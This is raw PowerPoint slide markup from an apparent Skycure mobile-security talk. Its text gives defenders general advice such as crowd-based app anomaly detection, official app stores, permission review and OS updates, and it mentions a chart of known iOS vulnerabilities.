                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="509112" y="2076871"/>
                  <a:pt x="0" y="2239631"/>
                  <a:pt x="0" y="2175177"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="11670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157" y="2157361"/>
            <a:ext cx="1439997" cy="10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7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Can Defenders Do?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200150"/>
            <a:ext cx="8481115" cy="3096022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Change the paradigm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Analyzing an app by itself is clearly not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Model other elements in the attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Utilize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>analysis of similar apps on other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Crowd-wisdom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>intelligence:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Compare app traits to all millions of apps that have been seen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Identify anomalies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Track new legitimate and malicious apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>without relying only on classic analysis approaches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45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possible, download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>apps only from official stores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Educate employees on the threats,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>as you would for other forms of computer-security threats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review the permissions requested by each app before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>installation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upgrade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>your device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS to the latest version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install a Mobile Threat Defense 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8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45941"/>
            <a:ext cx="9144000" cy="3897559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ANECDOTE ABOUT ANOTHER FAMILY OF THREATS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Known iOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Apr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. 15’ Est.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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044516"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1720766" y="1354898"/>
          <a:ext cx="5488443" cy="3452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23069" y="4807094"/>
            <a:ext cx="402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Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
              <a:t>Skycure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
              <a:t> analysis based of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Lato"/>
                <a:cs typeface="Lato"/>
              </a:rPr>
              <a:t>CVEdetails.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Lato"/>
              <a:cs typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6654800" y="283948"/>
            <a:ext cx="228600" cy="3787267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00468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64097" y="235632"/>
            <a:ext cx="698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4685"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Lato" charset="0"/>
                <a:cs typeface="Lato" charset="0"/>
              </a:rPr>
              <a:t>374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914897" y="272319"/>
            <a:ext cx="532575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2304" y="819816"/>
            <a:ext cx="1962899" cy="3048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1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Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is only one element of mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the threat landscape </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Physical, Network, Malware and Vulnerability threats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On the organizational level, build a mobile security strategy that addresses the Mobile Threat Landscape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C8676-1494-424A-9EE1-69F4EB666BA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1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And Next Steps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52552" y="1063229"/>
            <a:ext cx="6434248" cy="309602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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>contact@skycure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.skycure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://blog.skycure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://maps.skycure.com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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>YairAmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SkycureSecurity</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Skycure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1790582" y="2147389"/>
            <a:ext cx="398926" cy="397301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1845 w 1846"/>
              <a:gd name="T1" fmla="*/ 1397 h 1718"/>
              <a:gd name="T2" fmla="*/ 1837 w 1846"/>
              <a:gd name="T3" fmla="*/ 1460 h 1718"/>
              <a:gd name="T4" fmla="*/ 1789 w 1846"/>
              <a:gd name="T5" fmla="*/ 1571 h 1718"/>
              <a:gd name="T6" fmla="*/ 1747 w 1846"/>
              <a:gd name="T7" fmla="*/ 1619 h 1718"/>
              <a:gd name="T8" fmla="*/ 1629 w 1846"/>
              <a:gd name="T9" fmla="*/ 1696 h 1718"/>
              <a:gd name="T10" fmla="*/ 1498 w 1846"/>
              <a:gd name="T11" fmla="*/ 1717 h 1718"/>
              <a:gd name="T12" fmla="*/ 347 w 1846"/>
              <a:gd name="T13" fmla="*/ 1717 h 1718"/>
              <a:gd name="T14" fmla="*/ 216 w 1846"/>
              <a:gd name="T15" fmla="*/ 1696 h 1718"/>
              <a:gd name="T16" fmla="*/ 98 w 1846"/>
              <a:gd name="T17" fmla="*/ 1619 h 1718"/>
              <a:gd name="T18" fmla="*/ 56 w 1846"/>
              <a:gd name="T19" fmla="*/ 1571 h 1718"/>
              <a:gd name="T20" fmla="*/ 7 w 1846"/>
              <a:gd name="T21" fmla="*/ 1460 h 1718"/>
              <a:gd name="T22" fmla="*/ 0 w 1846"/>
              <a:gd name="T23" fmla="*/ 320 h 1718"/>
              <a:gd name="T24" fmla="*/ 7 w 1846"/>
              <a:gd name="T25" fmla="*/ 257 h 1718"/>
              <a:gd name="T26" fmla="*/ 56 w 1846"/>
              <a:gd name="T27" fmla="*/ 146 h 1718"/>
              <a:gd name="T28" fmla="*/ 98 w 1846"/>
              <a:gd name="T29" fmla="*/ 98 h 1718"/>
              <a:gd name="T30" fmla="*/ 216 w 1846"/>
              <a:gd name="T31" fmla="*/ 21 h 1718"/>
              <a:gd name="T32" fmla="*/ 347 w 1846"/>
              <a:gd name="T33" fmla="*/ 0 h 1718"/>
              <a:gd name="T34" fmla="*/ 1498 w 1846"/>
              <a:gd name="T35" fmla="*/ 0 h 1718"/>
              <a:gd name="T36" fmla="*/ 1629 w 1846"/>
              <a:gd name="T37" fmla="*/ 21 h 1718"/>
              <a:gd name="T38" fmla="*/ 1747 w 1846"/>
              <a:gd name="T39" fmla="*/ 98 h 1718"/>
              <a:gd name="T40" fmla="*/ 1789 w 1846"/>
              <a:gd name="T41" fmla="*/ 146 h 1718"/>
              <a:gd name="T42" fmla="*/ 1837 w 1846"/>
              <a:gd name="T43" fmla="*/ 257 h 1718"/>
              <a:gd name="T44" fmla="*/ 652 w 1846"/>
              <a:gd name="T45" fmla="*/ 1432 h 1718"/>
              <a:gd name="T46" fmla="*/ 964 w 1846"/>
              <a:gd name="T47" fmla="*/ 501 h 1718"/>
              <a:gd name="T48" fmla="*/ 305 w 1846"/>
              <a:gd name="T49" fmla="*/ 1432 h 1718"/>
              <a:gd name="T50" fmla="*/ 486 w 1846"/>
              <a:gd name="T51" fmla="*/ 1098 h 1718"/>
              <a:gd name="T52" fmla="*/ 604 w 1846"/>
              <a:gd name="T53" fmla="*/ 1321 h 1718"/>
              <a:gd name="T54" fmla="*/ 541 w 1846"/>
              <a:gd name="T55" fmla="*/ 1216 h 1718"/>
              <a:gd name="T56" fmla="*/ 423 w 1846"/>
              <a:gd name="T57" fmla="*/ 1153 h 1718"/>
              <a:gd name="T58" fmla="*/ 985 w 1846"/>
              <a:gd name="T59" fmla="*/ 661 h 1718"/>
              <a:gd name="T60" fmla="*/ 992 w 1846"/>
              <a:gd name="T61" fmla="*/ 668 h 1718"/>
              <a:gd name="T62" fmla="*/ 978 w 1846"/>
              <a:gd name="T63" fmla="*/ 696 h 1718"/>
              <a:gd name="T64" fmla="*/ 631 w 1846"/>
              <a:gd name="T65" fmla="*/ 1021 h 1718"/>
              <a:gd name="T66" fmla="*/ 604 w 1846"/>
              <a:gd name="T67" fmla="*/ 1028 h 1718"/>
              <a:gd name="T68" fmla="*/ 590 w 1846"/>
              <a:gd name="T69" fmla="*/ 1021 h 1718"/>
              <a:gd name="T70" fmla="*/ 583 w 1846"/>
              <a:gd name="T71" fmla="*/ 1007 h 1718"/>
              <a:gd name="T72" fmla="*/ 943 w 1846"/>
              <a:gd name="T73" fmla="*/ 661 h 1718"/>
              <a:gd name="T74" fmla="*/ 964 w 1846"/>
              <a:gd name="T75" fmla="*/ 654 h 1718"/>
              <a:gd name="T76" fmla="*/ 985 w 1846"/>
              <a:gd name="T77" fmla="*/ 661 h 1718"/>
              <a:gd name="T78" fmla="*/ 1498 w 1846"/>
              <a:gd name="T79" fmla="*/ 647 h 1718"/>
              <a:gd name="T80" fmla="*/ 1511 w 1846"/>
              <a:gd name="T81" fmla="*/ 633 h 1718"/>
              <a:gd name="T82" fmla="*/ 1526 w 1846"/>
              <a:gd name="T83" fmla="*/ 591 h 1718"/>
              <a:gd name="T84" fmla="*/ 1526 w 1846"/>
              <a:gd name="T85" fmla="*/ 571 h 1718"/>
              <a:gd name="T86" fmla="*/ 1518 w 1846"/>
              <a:gd name="T87" fmla="*/ 529 h 1718"/>
              <a:gd name="T88" fmla="*/ 1498 w 1846"/>
              <a:gd name="T89" fmla="*/ 494 h 1718"/>
              <a:gd name="T90" fmla="*/ 1311 w 1846"/>
              <a:gd name="T91" fmla="*/ 327 h 1718"/>
              <a:gd name="T92" fmla="*/ 1276 w 1846"/>
              <a:gd name="T93" fmla="*/ 306 h 1718"/>
              <a:gd name="T94" fmla="*/ 1228 w 1846"/>
              <a:gd name="T95" fmla="*/ 299 h 1718"/>
              <a:gd name="T96" fmla="*/ 1165 w 1846"/>
              <a:gd name="T97" fmla="*/ 313 h 1718"/>
              <a:gd name="T98" fmla="*/ 1041 w 1846"/>
              <a:gd name="T99" fmla="*/ 431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846" h="1718">
                <a:moveTo>
                  <a:pt x="1845" y="320"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1845" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1845" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1823" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="1696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="1696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1823" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1845" y="320"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="652" y="1432"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1311" y="820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652" y="1432"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="486" y="1098"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="666" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541" y="1216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423" y="1216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486" y="1098"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="985" y="661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="985" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="1028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604" y="1028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="661"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1387" y="751"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518" y="612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1311" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1311" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1276" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228" y="299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228" y="299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1186" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1151" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1387" y="751"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="6F5D2B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6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1790106" y="1653025"/>
            <a:ext cx="399878" cy="397301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1580 w 1851"/>
              <a:gd name="T1" fmla="*/ 251 h 1718"/>
              <a:gd name="T2" fmla="*/ 1656 w 1851"/>
              <a:gd name="T3" fmla="*/ 1383 h 1718"/>
              <a:gd name="T4" fmla="*/ 464 w 1851"/>
              <a:gd name="T5" fmla="*/ 1599 h 1718"/>
              <a:gd name="T6" fmla="*/ 124 w 1851"/>
              <a:gd name="T7" fmla="*/ 431 h 1718"/>
              <a:gd name="T8" fmla="*/ 1240 w 1851"/>
              <a:gd name="T9" fmla="*/ 584 h 1718"/>
              <a:gd name="T10" fmla="*/ 1420 w 1851"/>
              <a:gd name="T11" fmla="*/ 536 h 1718"/>
              <a:gd name="T12" fmla="*/ 1420 w 1851"/>
              <a:gd name="T13" fmla="*/ 466 h 1718"/>
              <a:gd name="T14" fmla="*/ 1338 w 1851"/>
              <a:gd name="T15" fmla="*/ 397 h 1718"/>
              <a:gd name="T16" fmla="*/ 1296 w 1851"/>
              <a:gd name="T17" fmla="*/ 397 h 1718"/>
              <a:gd name="T18" fmla="*/ 1261 w 1851"/>
              <a:gd name="T19" fmla="*/ 403 h 1718"/>
              <a:gd name="T20" fmla="*/ 1206 w 1851"/>
              <a:gd name="T21" fmla="*/ 348 h 1718"/>
              <a:gd name="T22" fmla="*/ 1108 w 1851"/>
              <a:gd name="T23" fmla="*/ 383 h 1718"/>
              <a:gd name="T24" fmla="*/ 1088 w 1851"/>
              <a:gd name="T25" fmla="*/ 480 h 1718"/>
              <a:gd name="T26" fmla="*/ 1067 w 1851"/>
              <a:gd name="T27" fmla="*/ 529 h 1718"/>
              <a:gd name="T28" fmla="*/ 901 w 1851"/>
              <a:gd name="T29" fmla="*/ 424 h 1718"/>
              <a:gd name="T30" fmla="*/ 866 w 1851"/>
              <a:gd name="T31" fmla="*/ 341 h 1718"/>
              <a:gd name="T32" fmla="*/ 984 w 1851"/>
              <a:gd name="T33" fmla="*/ 251 h 1718"/>
              <a:gd name="T34" fmla="*/ 1032 w 1851"/>
              <a:gd name="T35" fmla="*/ 209 h 1718"/>
              <a:gd name="T36" fmla="*/ 943 w 1851"/>
              <a:gd name="T37" fmla="*/ 237 h 1718"/>
              <a:gd name="T38" fmla="*/ 873 w 1851"/>
              <a:gd name="T39" fmla="*/ 195 h 1718"/>
              <a:gd name="T40" fmla="*/ 818 w 1851"/>
              <a:gd name="T41" fmla="*/ 195 h 1718"/>
              <a:gd name="T42" fmla="*/ 825 w 1851"/>
              <a:gd name="T43" fmla="*/ 251 h 1718"/>
              <a:gd name="T44" fmla="*/ 741 w 1851"/>
              <a:gd name="T45" fmla="*/ 237 h 1718"/>
              <a:gd name="T46" fmla="*/ 679 w 1851"/>
              <a:gd name="T47" fmla="*/ 181 h 1718"/>
              <a:gd name="T48" fmla="*/ 686 w 1851"/>
              <a:gd name="T49" fmla="*/ 230 h 1718"/>
              <a:gd name="T50" fmla="*/ 602 w 1851"/>
              <a:gd name="T51" fmla="*/ 237 h 1718"/>
              <a:gd name="T52" fmla="*/ 297 w 1851"/>
              <a:gd name="T53" fmla="*/ 515 h 1718"/>
              <a:gd name="T54" fmla="*/ 367 w 1851"/>
              <a:gd name="T55" fmla="*/ 591 h 1718"/>
              <a:gd name="T56" fmla="*/ 353 w 1851"/>
              <a:gd name="T57" fmla="*/ 710 h 1718"/>
              <a:gd name="T58" fmla="*/ 422 w 1851"/>
              <a:gd name="T59" fmla="*/ 828 h 1718"/>
              <a:gd name="T60" fmla="*/ 506 w 1851"/>
              <a:gd name="T61" fmla="*/ 931 h 1718"/>
              <a:gd name="T62" fmla="*/ 561 w 1851"/>
              <a:gd name="T63" fmla="*/ 1014 h 1718"/>
              <a:gd name="T64" fmla="*/ 513 w 1851"/>
              <a:gd name="T65" fmla="*/ 882 h 1718"/>
              <a:gd name="T66" fmla="*/ 589 w 1851"/>
              <a:gd name="T67" fmla="*/ 966 h 1718"/>
              <a:gd name="T68" fmla="*/ 665 w 1851"/>
              <a:gd name="T69" fmla="*/ 1098 h 1718"/>
              <a:gd name="T70" fmla="*/ 790 w 1851"/>
              <a:gd name="T71" fmla="*/ 1168 h 1718"/>
              <a:gd name="T72" fmla="*/ 950 w 1851"/>
              <a:gd name="T73" fmla="*/ 1223 h 1718"/>
              <a:gd name="T74" fmla="*/ 1032 w 1851"/>
              <a:gd name="T75" fmla="*/ 1300 h 1718"/>
              <a:gd name="T76" fmla="*/ 1019 w 1851"/>
              <a:gd name="T77" fmla="*/ 1258 h 1718"/>
              <a:gd name="T78" fmla="*/ 1019 w 1851"/>
              <a:gd name="T79" fmla="*/ 1195 h 1718"/>
              <a:gd name="T80" fmla="*/ 950 w 1851"/>
              <a:gd name="T81" fmla="*/ 1168 h 1718"/>
              <a:gd name="T82" fmla="*/ 956 w 1851"/>
              <a:gd name="T83" fmla="*/ 1070 h 1718"/>
              <a:gd name="T84" fmla="*/ 852 w 1851"/>
              <a:gd name="T85" fmla="*/ 1126 h 1718"/>
              <a:gd name="T86" fmla="*/ 783 w 1851"/>
              <a:gd name="T87" fmla="*/ 959 h 1718"/>
              <a:gd name="T88" fmla="*/ 825 w 1851"/>
              <a:gd name="T89" fmla="*/ 924 h 1718"/>
              <a:gd name="T90" fmla="*/ 908 w 1851"/>
              <a:gd name="T91" fmla="*/ 889 h 1718"/>
              <a:gd name="T92" fmla="*/ 1005 w 1851"/>
              <a:gd name="T93" fmla="*/ 924 h 1718"/>
              <a:gd name="T94" fmla="*/ 1067 w 1851"/>
              <a:gd name="T95" fmla="*/ 966 h 1718"/>
              <a:gd name="T96" fmla="*/ 1060 w 1851"/>
              <a:gd name="T97" fmla="*/ 862 h 1718"/>
              <a:gd name="T98" fmla="*/ 1130 w 1851"/>
              <a:gd name="T99" fmla="*/ 793 h 1718"/>
              <a:gd name="T100" fmla="*/ 1164 w 1851"/>
              <a:gd name="T101" fmla="*/ 744 h 1718"/>
              <a:gd name="T102" fmla="*/ 1226 w 1851"/>
              <a:gd name="T103" fmla="*/ 675 h 1718"/>
              <a:gd name="T104" fmla="*/ 1310 w 1851"/>
              <a:gd name="T105" fmla="*/ 605 h 1718"/>
